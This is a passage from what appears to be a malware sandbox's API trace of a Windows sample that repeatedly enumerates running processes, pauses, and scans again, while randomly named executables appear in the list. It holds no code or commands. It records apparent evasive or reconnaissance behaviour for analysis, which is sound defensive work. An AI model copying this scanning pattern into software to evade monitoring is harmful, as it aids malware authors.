dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.848] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0140.849] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.850] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0141.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0141.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0141.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0141.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0141.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0141.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0141.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0141.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0141.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0141.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0141.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0141.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0141.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0141.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0141.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0141.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0141.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0141.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0141.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0141.162] CloseHandle (hObject=0xc4) returned 1 [0141.162] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0141.167] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0141.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0141.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0141.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0141.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0141.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0141.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0141.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0141.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0141.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0141.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0141.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0141.263] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0141.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0141.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0141.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0141.293] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0141.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0141.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0141.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0141.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0141.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0141.304] CloseHandle (hObject=0xbc) returned 1 [0141.305] Sleep (dwMilliseconds=0x12c) [0142.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.181] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 